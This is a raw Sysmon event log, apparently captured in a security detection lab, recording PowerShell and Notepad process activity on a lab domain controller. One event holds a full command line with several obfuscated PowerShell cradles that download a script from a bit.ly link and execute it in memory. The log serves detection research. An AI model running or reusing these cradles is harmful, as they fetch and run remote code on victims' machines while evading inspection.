Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\dd36727cff7bcfbb59917492bccadad8\System.Management.Automation.ni.dll+6fbb4a0c(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\dd36727cff7bcfbb59917492bccadad8\System.Management.Automation.ni.dll+6fc12edb(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\dd36727cff7bcfbb59917492bccadad8\System.Management.Automation.ni.dll+6fbf6540(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\dd36727cff7bcfbb59917492bccadad8\System.Management.Automation.ni.dll+6fbf6540(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\dd36727cff7bcfbb59917492bccadad8\System.Management.Automation.ni.dll+6fbf6540(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\dd36727cff7bcfbb59917492bccadad8\System.Management.Automation.ni.dll+6fbf6540(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\dd36727cff7bcfbb59917492bccadad8\System.Management.Automation.ni.dll+6fbf6540(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\dd36727cff7bcfbb59917492bccadad8\System.Management.Automation.ni.dll+6fbf6540(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\dd36727cff7bcfbb59917492bccadad8\System.Management.Automation.ni.dll+6fbf63d1(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\dd36727cff7bcfbb59917492bccadad8\System.Management.Automation.ni.dll+6fbe8356(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\dd36727cff7bcfbb59917492bccadad8\System.Management.Automation.ni.dll+6fc214e6(wow64) 154100x80000000000000001695555Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:53:33.188{05ADC7E1-706D-603D-5488-00000000AD01}7076C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe10.0.14393.206 (rs1_release.160915-0644)Windows PowerShellMicrosoft® Windows® Operating SystemMicrosoft CorporationPowerShell.EXE"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" & {(New-Object Net.WebClient).DownloadFile('http://bit.ly/L3g1tCrad1e','Default_File_Path.ps1');IEX((-Join([IO.File]::ReadAllBytes('Default_File_Path.ps1')|ForEach-Object{[Char]$_}))) (New-Object Net.WebClient).DownloadFile('http://bit.ly/L3g1tCrad1e','Default_File_Path.ps1');[ScriptBlock]::Create((-Join([IO.File]::ReadAllBytes('Default_File_Path.ps1')|ForEach-Object{[Char]$_}))).InvokeReturnAsIs() Set-Variable HJ1 'http://bit.ly/L3g1tCrad1e';SI Variable:/0W 'Net.WebClient';Set-Item Variable:\gH 'Default_File_Path.ps1';ls _-*;Set-Variable igZ (.$ExecutionContext.InvokeCommand.(($ExecutionContext.InvokeCommand.PsObject.Methods|?{$_.Name-like'*Cm*t'}).Name).Invoke($ExecutionContext.InvokeCommand.(($ExecutionContext.InvokeCommand|GM|?{$_.Name-like'*om*e'}).Name).Invoke('*w-*ct',$TRUE,1))(Get-ChildItem Variable:0W).Value);Set-Variable J ((((Get-Variable igZ -ValueOn)|GM)|?{$_.Name-like'*w*i*le'}).Name);(Get-Variable igZ -ValueOn).((ChildItem Variable:J).Value).Invoke((Get-Item Variable:/HJ1).Value,(GV gH).Value);&( ''.IsNormalized.ToString()[13,15,48]-Join'')(-Join([Char[]](CAT -Enco 3 (GV gH).Value)))} C:\Users\ADMINI~1\AppData\Local\Temp\2\ATTACKRANGE\Administrator{05ADC7E1-29F1-6039-B11D-350000000000}0x351db12HighMD5=097CE5761C89434367598B34FE32893B,SHA256=BA4038FD20E474C047BE8AAD5BFACDB1BFC1DDBE12F803F473B7918D8D819436,IMPHASH=CAEE994F79D85E47C06E5FA9CDEAE453{05ADC7E1-7049-603D-4188-00000000AD01}5784C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" 11241100x80000000000000001695554Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:53:33.176{05ADC7E1-7049-603D-4188-00000000AD01}5784C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\ADMINI~1\AppData\Local\Temp\2\art-err.txt2021-03-01 22:53:21.483 11241100x80000000000000001695553Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:53:33.176{05ADC7E1-7049-603D-4188-00000000AD01}5784C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\ADMINI~1\AppData\Local\Temp\2\art-out.txt2021-03-01 22:53:21.480 23542300x80000000000000001695552Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:53:33.161{05ADC7E1-7049-603D-4188-00000000AD01}5784ATTACKRANGE\AdministratorC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\2\art-err.txtMD5=A79B2BA47C73401205D92093173213E1,SHA256=7FB66C8D3A4C9E0BA51E0A3C28C7B2088766CA2ABB8204F695EDB467550581C9,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001695551Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:53:33.114{05ADC7E1-7049-603D-4188-00000000AD01}5784ATTACKRANGE\AdministratorC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\2\art-out.txtMD5=3C0D9681A001E394FB5A1D799195BF3C,SHA256=B0C833077DCAD54DAFAF461E4F34FD1A18A43FF8DE989F07E9A9359BF07224C1,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001695550Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:53:33.067{05ADC7E1-7067-603D-5388-00000000AD01}6264ATTACKRANGE\AdministratorC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractiveMD5=446DD1CF97EABA21CF14D03AEBC79F27,SHA256=A7DE5177C68A64BD48B36D49E2853799F4EBCFA8E4761F7CC472F333DC5F65CF,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001695584Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:53:26.942{05ADC7E1-706D-603D-5488-00000000AD01}7076C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeATTACKRANGE\Administratortcptruefalse10.0.1.14win-dc-974.attackrange.local55121-false104.23.99.190-80http 10341000x80000000000000001695583Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:53:34.973{05ADC7E1-22AF-6039-2800-00000000AD01}19363196C:\Windows\sysmon64.exe{05ADC7E1-706D-603D-5488-00000000AD01}7076C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\ntdll.dll+6cdaa|C:\Windows\System32\KERNEL32.DLL+1cff8|C:\Windows\System32\KERNEL32.DLL+25a87|C:\Windows\sysmon64.exe+14ced|C:\Windows\sysmon64.exe+15adb|C:\Windows\sysmon64.exe+16c29|C:\Windows\sysmon64.exe+1abb1|C:\Windows\sysmon64.exe+1cfc7|C:\Windows\sysmon64.exe+1d392|C:\Windows\sysmon64.exe+1d4a5|C:\Windows\sysmon64.exe+b0519|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001695582Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:53:34.973{05ADC7E1-22AF-6039-2800-00000000AD01}19363196C:\Windows\sysmon64.exe{05ADC7E1-706D-603D-5488-00000000AD01}7076C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\sysmon64.exe+2682c|C:\Windows\sysmon64.exe+1cc6d|C:\Windows\sysmon64.exe+1d392|C:\Windows\sysmon64.exe+1d4a5|C:\Windows\sysmon64.exe+b0519|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 354300x80000000000000001695581Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:53:26.824{05ADC7E1-22AF-6039-2D00-00000000AD01}2664C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-974.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-974.attackrange.local56809- 11241100x80000000000000001695580Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:53:34.911{05ADC7E1-706D-603D-5488-00000000AD01}7076C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\2\Default_File_Path.ps12021-03-01 22:53:33.433 23542300x80000000000000001695579Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:53:34.911{05ADC7E1-706D-603D-5488-00000000AD01}7076ATTACKRANGE\AdministratorC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\2\Default_File_Path.ps1MD5=DCE6250005968B2E1003165602177255,SHA256=4013A9DB2598C677B34A6C4753E91216B844C567D5110931647C38680DE03BAF,IMPHASH=00000000000000000000000000000000falsetrue 11241100x80000000000000001695578Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:53:34.631{05ADC7E1-706D-603D-5488-00000000AD01}7076C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\2\Default_File_Path.ps12021-03-01 22:53:33.433 23542300x80000000000000001695577Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:53:34.631{05ADC7E1-706D-603D-5488-00000000AD01}7076ATTACKRANGE\AdministratorC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\2\Default_File_Path.ps1MD5=DCE6250005968B2E1003165602177255,SHA256=4013A9DB2598C677B34A6C4753E91216B844C567D5110931647C38680DE03BAF,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001695576Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:53:34.207{05ADC7E1-FB2E-603C-9079-00000000AD01}4328NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=58A2D3365F06C12C4942BC5F03DCC3BC,SHA256=A71676D6626C2F7B42E539AA90969BE09E329C446065DDBDCEA63A5CD8C75098,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001695575Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:53:34.207{05ADC7E1-FB2E-603C-9079-00000000AD01}4328NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=57DCA8AA3D2122C1935594ADC1DCCAC2,SHA256=193A3DE820EA6A8297846757798B54A8BE97BAB33DCB42AD6C9393365E0674ED,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001695574Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:53:34.207{05ADC7E1-FB2E-603C-9079-00000000AD01}4328NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=01F778930A8B0FED723626D64B29EBCD,SHA256=FD773D956F96DB8FA32319349D5820D73A58CABF00C4F8C1CAA673FA5C9077D0,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001695655Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:53:35.973{05ADC7E1-706F-603D-5688-00000000AD01}59568392C:\Windows\SYSTEM32\Notepad.exe{05ADC7E1-1E7A-603D-D07D-00000000AD01}5796C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+6497|C:\Windows\System32\shcore.dll+6387|C:\Windows\System32\shcore.dll+62fd|C:\Windows\System32\shcore.dll+620a|C:\Windows\System32\windows.storage.dll+da74e|C:\Windows\System32\windows.storage.dll+dab86|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11ed7|C:\Windows\System32\USER32.dll+22a53|C:\Windows\SYSTEM32\ntdll.dll+a9764|UNKNOWN(FFFFF80071E698C8)|UNKNOWN(FFFF9F0F018B4978)|UNKNOWN(FFFF9F0F018AF625)|UNKNOWN(FFFF9F0F018B0B4A)|UNKNOWN(FFFF9F0F018FEF55)|UNKNOWN(FFFFF80071B80E03)|C:\Windows\System32\win32u.dll+2da4|C:\Windows\system32\DUser.dll+bebd|C:\Windows\system32\DUser.dll+bb02|C:\Windows\System32\USER32.dll+26924|C:\Windows\SYSTEM32\ntdll.dll+a9764 10341000x80000000000000001695654Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:53:35.957{05ADC7E1-706F-603D-5688-00000000AD01}59568392C:\Windows\SYSTEM32\Notepad.exe{05ADC7E1-1E7A-603D-D07D-00000000AD01}5796C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+1c0e5|C:\Windows\System32\windows.storage.dll+da865|C:\Windows\System32\windows.storage.dll+da983|C:\Windows\System32\windows.storage.dll+dae18|C:\Windows\System32\windows.storage.dll+db1cb|C:\Windows\System32\windows.storage.dll+d1aa1|C:\Windows\System32\windows.storage.dll+d3416|C:\Windows\System32\windows.storage.dll+d3c91|C:\Windows\system32\explorerframe.dll+7761f|C:\Windows\system32\explorerframe.dll+77b28|C:\Windows\system32\explorerframe.dll+4e34a|C:\Windows\system32\explorerframe.dll+4ff93|C:\Windows\system32\explorerframe.dll+477b7|C:\Windows\System32\SHELL32.dll+bca1c|C:\Windows\System32\SHELL32.dll+bc565|C:\Windows\System32\SHELL32.dll+bd07d|C:\Windows\System32\SHELL32.dll+c069f|C:\Windows\System32\SHELL32.dll+13c76e|C:\Windows\System32\SHELL32.dll+13c386|C:\Windows\System32\SHELL32.dll+13be03|C:\Windows\System32\SHELL32.dll+13ba1b 10341000x80000000000000001695653Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:53:35.957{05ADC7E1-706F-603D-5688-00000000AD01}59568392C:\Windows\SYSTEM32\Notepad.exe{05ADC7E1-1E7A-603D-D07D-00000000AD01}5796C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+1c0e5|C:\Windows\System32\windows.storage.dll+da7e1|C:\Windows\System32\windows.storage.dll+da983|C:\Windows\System32\windows.storage.dll+dae18|C:\Windows\System32\windows.storage.dll+db1cb|C:\Windows\System32\windows.storage.dll+d1aa1|C:\Windows\System32\windows.storage.dll+d3416|C:\Windows\System32\windows.storage.dll+d3c91|C:\Windows\system32\explorerframe.dll+7761f|C:\Windows\system32\explorerframe.dll+77b28|C:\Windows\system32\explorerframe.dll+4e34a|C:\Windows\system32\explorerframe.dll+4ff93|C:\Windows\system32\explorerframe.dll+477b7|C:\Windows\System32\SHELL32.dll+bca1c|C:\Windows\System32\SHELL32.dll+bc565|C:\Windows\System32\SHELL32.dll+bd07d|C:\Windows\System32\SHELL32.dll+c069f|C:\Windows\System32\SHELL32.dll+13c76e|C:\Windows\System32\SHELL32.dll+13c386|C:\Windows\System32\SHELL32.dll+13be03|C:\Windows\System32\SHELL32.dll+13ba1b 10341000x80000000000000001695652Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:53:35.957{05ADC7E1-706F-603D-5688-00000000AD01}59568392C:\Windows\SYSTEM32\Notepad.exe{05ADC7E1-1E7A-603D-D07D-00000000AD01}5796C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+6482|C:\Windows\System32\shcore.dll+617d|C:\Windows\System32\shcore.dll+5e3d|C:\Windows\System32\shcore.dll+5dcf|C:\Windows\System32\shcore.dll+5cd4|C:\Windows\System32\windows.storage.dll+da7c5|C:\Windows\System32\windows.storage.dll+da983|C:\Windows\System32\windows.storage.dll+dae18|C:\Windows\System32\windows.storage.dll+db1cb|C:\Windows\System32\windows.storage.dll+d1aa1|C:\Windows\System32\windows.storage.dll+d3416|C:\Windows\System32\windows.storage.dll+d3c91|C:\Windows\system32\explorerframe.dll+7761f|C:\Windows\system32\explorerframe.dll+77b28|C:\Windows\system32\explorerframe.dll+4e34a|C:\Windows\system32\explorerframe.dll+4ff93|C:\Windows\system32\explorerframe.dll+477b7|C:\Windows\System32\SHELL32.dll+bca1c|C:\Windows\System32\SHELL32.dll+bc565|C:\Windows\System32\SHELL32.dll+bd07d|C:\Windows\System32\SHELL32.dll+c069f 10341000x80000000000000001695651Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:53:35.957{05ADC7E1-706F-603D-5688-00000000AD01}59568392C:\Windows\SYSTEM32\Notepad.exe{05ADC7E1-1E7A-603D-D07D-00000000AD01}5796C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+6154|C:\Windows\System32\shcore.dll+5e3d|C:\Windows\System32\shcore.dll+5dcf|C:\Windows\System32\shcore.dll+5cd4|C:\Windows\System32\windows.storage.dll+da7c5|C:\Windows\System32\windows.storage.dll+da983|C:\Windows\System32\windows.storage.dll+dae18|C:\Windows\System32\windows.storage.dll+db1cb|C:\Windows\System32\windows.storage.dll+d1aa1|C:\Windows\System32\windows.storage.dll+d3416|C:\Windows\System32\windows.storage.dll+d3c91|C:\Windows\system32\explorerframe.dll+7761f|C:\Windows\system32\explorerframe.dll+77b28|C:\Windows\system32\explorerframe.dll+4e34a|C:\Windows\system32\explorerframe.dll+4ff93|C:\Windows\system32\explorerframe.dll+477b7|C:\Windows\System32\SHELL32.dll+bca1c|C:\Windows\System32\SHELL32.dll+bc565|C:\Windows\System32\SHELL32.dll+bd07d|C:\Windows\System32\SHELL32.dll+c069f|C:\Windows\System32\SHELL32.dll+13c76e 10341000x80000000000000001695650Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:53:35.932{05ADC7E1-706F-603D-5688-00000000AD01}59568708C:\Windows\SYSTEM32\Notepad.exe{05ADC7E1-1E7A-603D-D07D-00000000AD01}5796C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+6497|C:\Windows\System32\shcore.dll+6387|C:\Windows\System32\shcore.dll+62fd|C:\Windows\System32\shcore.dll+620a|C:\Windows\System32\windows.storage.dll+da74e|C:\Windows\System32\windows.storage.dll+dab86|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11ed7|C:\Windows\System32\USER32.dll+22a53|C:\Windows\SYSTEM32\ntdll.dll+a9764|UNKNOWN(FFFFF80071E698C8)|UNKNOWN(FFFF9F0F018B4978)|UNKNOWN(FFFF9F0F018AF625)|UNKNOWN(FFFF9F0F018B0B4A)|UNKNOWN(FFFF9F0F018AFAA2)|UNKNOWN(FFFFF80071B80E03)|C:\Windows\System32\win32u.dll+1164|C:\Windows\System32\USER32.dll+24d56|C:\Windows\System32\windows.storage.dll+1aa7fb|C:\Windows\System32\shcore.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x80000000000000001695649Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:53:35.931{05ADC7E1-706F-603D-5688-00000000AD01}59568708C:\Windows\SYSTEM32\Notepad.exe{05ADC7E1-1E7A-603D-D07D-00000000AD01}5796C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+6497|C:\Windows\System32\shcore.dll+6387|C:\Windows\System32\shcore.dll+62fd|C:\Windows\System32\shcore.dll+620a|C:\Windows\System32\windows.storage.dll+da74e|C:\Windows\System32\windows.storage.dll+dab86|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11ed7|C:\Windows\System32\USER32.dll+22a53|C:\Windows\SYSTEM32\ntdll.dll+a9764|UNKNOWN(FFFFF80071E698C8)|UNKNOWN(FFFF9F0F018B4978)|UNKNOWN(FFFF9F0F018AF625)|UNKNOWN(FFFF9F0F018B0B4A)|UNKNOWN(FFFF9F0F018AFAA2)|UNKNOWN(FFFFF80071B80E03)|C:\Windows\System32\win32u.dll+1164|C:\Windows\System32\USER32.dll+24d56|C:\Windows\System32\windows.storage.dll+1aa7fb|C:\Windows\System32\shcore.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x80000000000000001695648Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:53:35.931{05ADC7E1-706F-603D-5688-00000000AD01}59568708C:\Windows\SYSTEM32\Notepad.exe{05ADC7E1-1E7A-603D-D07D-00000000AD01}5796C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+1c0e5|C:\Windows\System32\windows.storage.dll+da865|C:\Windows\System32\windows.storage.dll+da983|C:\Windows\System32\windows.storage.dll+dae18|C:\Windows\System32\windows.storage.dll+db1cb|C:\Windows\System32\windows.storage.dll+1460ed|C:\Windows\System32\windows.storage.dll+1a3e08|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11ed7|C:\Windows\System32\USER32.dll+22a53|C:\Windows\SYSTEM32\ntdll.dll+a9764|UNKNOWN(FFFFF80071E698C8)|UNKNOWN(FFFF9F0F018B4978)|UNKNOWN(FFFF9F0F018B4AF7)|UNKNOWN(FFFF9F0F018AF181)|UNKNOWN(FFFF9F0F018B0B4A)|UNKNOWN(FFFF9F0F018AFAA2)|UNKNOWN(FFFFF80071B80E03)|C:\Windows\System32\win32u.dll+1164|C:\Windows\System32\USER32.dll+24d56|C:\Windows\System32\windows.storage.dll+1aa7fb 10341000x80000000000000001695647Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:53:35.930{05ADC7E1-706F-603D-5688-00000000AD01}59568708C:\Windows\SYSTEM32\Notepad.exe{05ADC7E1-1E7A-603D-D07D-00000000AD01}5796C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+1c0e5|C:\Windows\System32\windows.storage.dll+da7e1|C:\Windows\System32\windows.storage.dll+da983|C:\Windows\System32\windows.storage.dll+dae18|C:\Windows\System32\windows.storage.dll+db1cb|C:\Windows\System32\windows.storage.dll+1460ed|C:\Windows\System32\windows.storage.dll+1a3e08|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11ed7|C:\Windows\System32\USER32.dll+22a53|C:\Windows\SYSTEM32\ntdll.dll+a9764|UNKNOWN(FFFFF80071E698C8)|UNKNOWN(FFFF9F0F018B4978)|UNKNOWN(FFFF9F0F018B4AF7)|UNKNOWN(FFFF9F0F018AF181)|UNKNOWN(FFFF9F0F018B0B4A)|UNKNOWN(FFFF9F0F018AFAA2)|UNKNOWN(FFFFF80071B80E03)|C:\Windows\System32\win32u.dll+1164|C:\Windows\System32\USER32.dll+24d56|C:\Windows\System32\windows.storage.dll+1aa7fb 10341000x80000000000000001695646Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:53:35.930{05ADC7E1-706F-603D-5688-00000000AD01}59568708C:\Windows\SYSTEM32\Notepad.exe{05ADC7E1-1E7A-603D-D07D-00000000AD01}5796C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+6482|C:\Windows\System32\shcore.dll+617d|C:\Windows\System32\shcore.dll+5e3d|C:\Windows\System32\shcore.dll+5dcf|C:\Windows\System32\shcore.dll+5cd4|C:\Windows\System32\windows.storage.dll+da7c5|C:\Windows\System32\windows.storage.dll+da983|C:\Windows\System32\windows.storage.dll+dae18|C:\Windows\System32\windows.storage.dll+db1cb|C:\Windows\System32\windows.storage.dll+1460ed|C:\Windows\System32\windows.storage.dll+1a3e08|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11ed7|C:\Windows\System32\USER32.dll+22a53|C:\Windows\SYSTEM32\ntdll.dll+a9764|UNKNOWN(FFFFF80071E698C8)|UNKNOWN(FFFF9F0F018B4978)|UNKNOWN(FFFF9F0F018B4AF7)|UNKNOWN(FFFF9F0F018AF181)|UNKNOWN(FFFF9F0F018B0B4A)|UNKNOWN(FFFF9F0F018AFAA2) 10341000x80000000000000001695645Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:53:35.930{05ADC7E1-706F-603D-5688-00000000AD01}59568708C:\Windows\SYSTEM32\Notepad.exe{05ADC7E1-1E7A-603D-D07D-00000000AD01}5796C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+6154|C:\Windows\System32\shcore.dll+5e3d|C:\Windows\System32\shcore.dll+5dcf|C:\Windows\System32\shcore.dll+5cd4|C:\Windows\System32\windows.storage.dll+da7c5|C:\Windows\System32\windows.storage.dll+da983|C:\Windows\System32\windows.storage.dll+dae18|C:\Windows\System32\windows.storage.dll+db1cb|C:\Windows\System32\windows.storage.dll+1460ed|C:\Windows\System32\windows.storage.dll+1a3e08|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11ed7|C:\Windows\System32\USER32.dll+22a53|C:\Windows\SYSTEM32\ntdll.dll+a9764|UNKNOWN(FFFFF80071E698C8)|UNKNOWN(FFFF9F0F018B4978)|UNKNOWN(FFFF9F0F018B4AF7)|UNKNOWN(FFFF9F0F018AF181)|UNKNOWN(FFFF9F0F018B0B4A)|UNKNOWN(FFFF9F0F018AFAA2)|UNKNOWN(FFFFF80071B80E03) 10341000x80000000000000001695644Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:53:35.930{05ADC7E1-706F-603D-5688-00000000AD01}59568708C:\Windows\SYSTEM32\Notepad.exe{05ADC7E1-1E7A-603D-D07D-00000000AD01}5796C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+1c0e5|C:\Windows\System32\windows.storage.dll+da865|C:\Windows\System32\windows.storage.dll+da983|C:\Windows\System32\windows.storage.dll+dae18|C:\Windows\System32\windows.storage.dll+db1cb|C:\Windows\System32\windows.storage.dll+1460ed|C:\Windows\System32\windows.storage.dll+1a3e08|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11ed7|C:\Windows\System32\USER32.dll+22a53|C:\Windows\SYSTEM32\ntdll.dll+a9764|UNKNOWN(FFFFF80071E698C8)|UNKNOWN(FFFF9F0F018B4978)|UNKNOWN(FFFF9F0F018B4AF7)|UNKNOWN(FFFF9F0F018AF181)|UNKNOWN(FFFF9F0F018B0B4A)|UNKNOWN(FFFF9F0F018AFAA2)|UNKNOWN(FFFFF80071B80E03)|C:\Windows\System32\win32u.dll+1164|C:\Windows\System32\USER32.dll+24d56|C:\Windows\System32\windows.storage.dll+1aa7fb 10341000x80000000000000001695643Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 